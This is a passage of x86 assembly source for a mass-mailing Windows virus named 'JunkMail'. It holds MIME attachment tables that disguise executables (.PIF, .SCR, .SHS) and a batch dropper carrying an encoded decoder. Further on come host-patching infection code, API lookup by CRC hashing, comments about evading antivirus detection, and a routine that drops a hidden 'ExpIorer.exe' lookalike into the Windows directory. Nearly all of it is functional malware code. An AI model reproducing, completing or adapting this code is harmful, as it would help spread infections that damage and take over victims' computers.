;-----------------------------------------------------------------------------
;and, of course, a not-exploited type
;-----------------------------------------------------------------------------
usecide db offset usecidf - offset $ - 1, "APPLICATION/OCTET-STREAM;"
usecidf db 0
part31 db offset suffix1 - offset $ - 2, " NAME=EMAIL", 0
suffix1 db 8ah
db offset suffix1b - offset $ - 1, ".AVI"
suffix1b db offset suffix1c - offset $ - 1, ".BMP"
suffix1c db offset suffix1d - offset $ - 1, ".DOC"
suffix1d db offset suffix1e - offset $ - 1, ".GIF"
suffix1e db offset suffix1f - offset $ - 1, ".JPG"
suffix1f db offset suffix1g - offset $ - 1, ".MDB"
suffix1g db offset suffix1h - offset $ - 1, ".MPG"
suffix1h db offset suffix1i - offset $ - 1, ".TXT"
suffix1i db offset suffix1j - offset $ - 1, ".XLS"
suffix1j db offset suffix1k - offset $ - 1, ".ZIP"
suffix1k db 0
suffix2 db 86h
db offset suffix2b - offset $ - 1, ".BAT" ;text, not binary
;binary cannot be .bat in Windows NT/2000/XP
suffix2b db offset suffix2c - offset $ - 1, ".COM"
suffix2c db offset suffix2d - offset $ - 1, ".EXE"
suffix2d db offset suffix2e - offset $ - 1, ".PIF" ;hidden
suffix2e db offset suffix2f - offset $ - 1, ".SCR"
suffix2f db offset suffix2g - offset $ - 1, ".SHS" ;ole2, hidden
;.shb cannot launch in Windows 2000/XP
suffix2g db 0
part32 db offset part33 - offset $ - 2, "BASE64", 0
part33 db offset part34 - offset $ - 2, 0dh, "CONTENT-ID:", 0
part34 db offset batdrop1 - offset $ - 2, '<', ourcid, '>', 0
;-----------------------------------------------------------------------------
;OS-independent .bat dropper
;-----------------------------------------------------------------------------
batdrop1 db offset batdrop2 - offset $ - 1
db "@ECHO OFF", 0dh
db "SET %R=^^^^", 0dh
db "IF NOT %OS%T==T GOTO F", 0dh
db "SET %R=^", 0dh
db ":F", 0dh
;-----------------------------------------------------------------------------
;COM2ASCII-encoded base64 decoder without dictionary by RT Fishel
;-----------------------------------------------------------------------------
batdrop2 db offset batdrop3 - offset $ - 1
db "ECHO XPH74bP%R%5W1P](d!(d')t)(d)(d+)t.)t/)l0)l4)t6)t7)t8)l9)l;(d?)lB(dE(dG(dI)tJ(dJ)tK(dL)tM)tN)tP(dP)lR)lR)tU(dU"
batdrop3 db offset part35 - offset $ - 2
db ")tZ)tc)tl)tnVX,B,BP_ %%GW44PW%R%jD[FFKt(fDl4Yf():l0s54$)Q444l?v8,ElIv2,6f?C+8IGh)ho(fBQFNu1jRQX5TmZ4#P[5F@IZ4#*I=", 0dh, 0
part35 db offset part36 - offset $ - 2, ".", 0dh, 0
part36 db offset part37 - offset $ - 2, "QUIT", 0dh, 0
part37 equ $
include junkmail.inc
txttitle db "JunkMail", 0
if compress_only
txtbody db "compress done", 0
else
txtbody db "running...", 0
patch_host label near
pop ecx
push ecx
call $ + 5
pop eax
add eax, offset host_patch - offset $ + 6
sub ecx, eax
push ecx
mov eax, esp
xor edi, edi
push edi
push 4
push eax
push offset host_patch + 1
push esi
call WriteProcessMemory
jmp junkmail_inf
;-----------------------------------------------------------------------------
;everything before this point is dropper code
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
;virus code begins here in infected files
;-----------------------------------------------------------------------------
junkmail_inf proc near
pushad
call walk_seh
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
expcrcbegin label near ;place < 80h bytes from call for smaller code
dd (expcrc_count + 1) dup (0)
expcrcend label near
dd offset drop_exp - offset expcrcend + 4
db "JunkMail - roy g biv / RT Fishel"
;spam just got harder to remove ;)
walk_seh label near
xor esi, esi
lods dword ptr fs:[esi]
inc eax
seh_loop label near
dec eax
xchg esi, eax
lods dword ptr [esi]
inc eax
jne seh_loop
lods dword ptr [esi]
;-----------------------------------------------------------------------------
;moved label after some data because "e800000000" looks like virus code ;)
;-----------------------------------------------------------------------------
init_findmz label near
inc eax
xchg edi, eax
find_mzhdr label near
;-----------------------------------------------------------------------------
;do not use hard-coded kernel address values because it is not portable
;Microsoft used all different values for 95, 98, NT, 2000, Me, XP
;they will maybe change again for every new release
;-----------------------------------------------------------------------------
dec edi ;sub 64kb
xor di, di ;64kb align
call is_pehdr
jne find_mzhdr
mov ebx, edi
pop edi
;-----------------------------------------------------------------------------
;parse export table
;-----------------------------------------------------------------------------
mov esi, dword ptr [esi + pehdr.peexport.dirrva - pehdr.pecoff]
lea esi, dword ptr [ebx + esi + peexp.expordbase]
lods dword ptr [esi] ;Ordinal Base
lea ebp, dword ptr [eax * 2 + ebx]
lods dword ptr [esi]
lods dword ptr [esi]
lods dword ptr [esi] ;Export Address Table RVA
lea edx, dword ptr [ebx + eax]
lods dword ptr [esi] ;Name Pointer Table RVA
add ebp, dword ptr [esi] ;Ordinal Table RVA
lea ecx, dword ptr [ebx + eax]
mov esi, ecx
push_export label near
push ecx
get_export label near
lods dword ptr [esi]
push ebx
add ebx, eax ;Name Pointer VA
or eax, -1
crc_outer label near
xor al, byte ptr [ebx]
push 8
pop ecx
crc_inner label near
add eax, eax
jnb crc_skip
xor eax, 4c11db7h ;use generator polymonial (see IEEE 802)
crc_skip label near
loop crc_inner
sub cl, byte ptr [ebx] ;carry set if not zero
inc ebx ;carry not altered by inc
jb crc_outer
pop ebx
cmp dword ptr [edi], eax
jne get_export
;-----------------------------------------------------------------------------
;exports must be sorted alphabetically, otherwise GetProcAddress() would fail
;this allows to push addresses onto the stack, and the order is known
;-----------------------------------------------------------------------------
pop ecx
mov eax, esi
sub eax, ecx ;Name Pointer Table VA
shr eax, 1
movzx eax, word ptr [ebp + eax - 4] ;get export ordinal
mov eax, dword ptr [eax * 4 + edx] ;get export RVA
add eax, ebx
push eax
scas dword ptr [edi]
cmp dword ptr [edi], 0
jne push_export
add edi, dword ptr [edi + 4]
jmp edi
dispname label near
db "ExpIorer", 0
explabel label near
db "ExpIorer.exe", 0
drop_exp label near
mov ebx, esp
lea esi, dword ptr [edi + offset explabel - offset drop_exp]
mov edi, offset junkmail_codeend - offset junkmail_inf + expsize + 80h + 1ffh
;file size must be > end of last section
push edi
xor ebp, ebp ;GMEM_FIXED
push ebp
call dword ptr [ebx + expcrcstk.pGlobalAlloc]
push eax ;GlobalFree
push ebp ;WriteFile
push esp ;WriteFile
push edi ;WriteFile
push ebp ;CreateFileA
push FILE_ATTRIBUTE_HIDDEN ;CreateFileA
push CREATE_ALWAYS ;CreateFileA
push ebp ;CreateFileA
push ebp ;CreateFileA
push GENERIC_WRITE ;CreateFileA
push eax ;CreateFileA
lea ecx, dword ptr [eax + 7fh]
push ecx ;MoveFileA
push eax ;MoveFileA
push eax ;GetFileAttributesA
push ebp ;SetFileAttributesA
push eax ;SetFileAttributesA
push ecx ;DeleteFileA
push ecx ;GetTempFileNameA
push ebp ;GetTempFileNameA
push esp ;GetTempFileNameA
push eax ;GetTempFileNameA
push edi ;GetWindowsDirectoryA
push eax ;GetWindowsDirectoryA
xchg ebp, eax
call dword ptr [ebx + expcrcstk.pGetWindowsDirectoryA]
lea edi, dword ptr [ebp + eax - 1]
call dword ptr [ebx + expcrcstk.pGetTempFileNameA]
call dword ptr [ebx + expcrcstk.pDeleteFileA]
mov al, '\'
scas byte ptr [edi]
je skip_slash
stos byte ptr [edi]
;-----------------------------------------------------------------------------
;append exe name, assumes name is 0dh bytes long
;-----------------------------------------------------------------------------
skip_slash label near
movs dword ptr [edi], dword ptr [esi]
movs dword ptr [edi], dword ptr [esi]
movs dword ptr [edi], dword ptr [esi]
movs byte ptr [edi], byte ptr [esi]
;-----------------------------------------------------------------------------
;anti-anti-file dropper - remove read-only attribute, delete file, rename directory
;-----------------------------------------------------------------------------
call dword ptr [ebx + expcrcstk.pSetFileAttributesA]
call dword ptr [ebx + expcrcstk.pGetFileAttributesA]
test al, FILE_ATTRIBUTE_DIRECTORY
pop ecx
pop eax
je skip_move
push eax
push ecx
call dword ptr [ebx + expcrcstk.pMoveFileA]
skip_move label near
call dword ptr [ebx + expcrcstk.pCreateFileA]
push edi ;WriteFile
push ebx
xchg ebp, eax
call dword ptr [ebx + expcrcstk.pGetTickCount]
xchg ebx, eax
xor ecx, ecx
;-----------------------------------------------------------------------------
;decompress MZ header, PE header, section table, import table
;-----------------------------------------------------------------------------
call decomprle
expsize equ 0d4h
;RLE-based compressed MZ header, PE header, import table, section table
;execution continues immediately after compressed data. be careful ;)
dd 11111111110000011100001011100000b
; mmmmmmmmmmz 01mmz 02mmm
db 'M', 'Z', "gdi32.dll", 'P', 'E', 4ch, 1, 1
dd 00000110000111100001001010010000b
; z 01mz 03mmz 02r 04m
db 2, 2ch, 10h, 88h
dd 00000111110100100001001000111110b
; z 01mmmmr 02z 04mz 07mm
db 0fh, 3, 0bh, 1, 56h, (offset junkmail_exe - offset junkmail_inf + expsize) and 0ffh, ((junkmail_exe - offset junkmail_inf + expsize + 1000h) shr 8) and 0ffh
dd 00001001010010001011000010100001b
; z 02r 04mz 05mz 02mz 02
db 0ch, 40h, 10h
dd 00000110000101010111100001111100b
; z 01mz 02mr 07mz 03mmm
db 2, 1, 4, "Arc"
dd 00001010000101000111100000101001b
; z 02mz 03mz 07mz 01r 02
db ((junkmail_codeend - offset junkmail_inf + expsize + 80h + 1fffh) and not 0fffh) shr 8, expsize, 2
dd 10000111000011100001110000110101b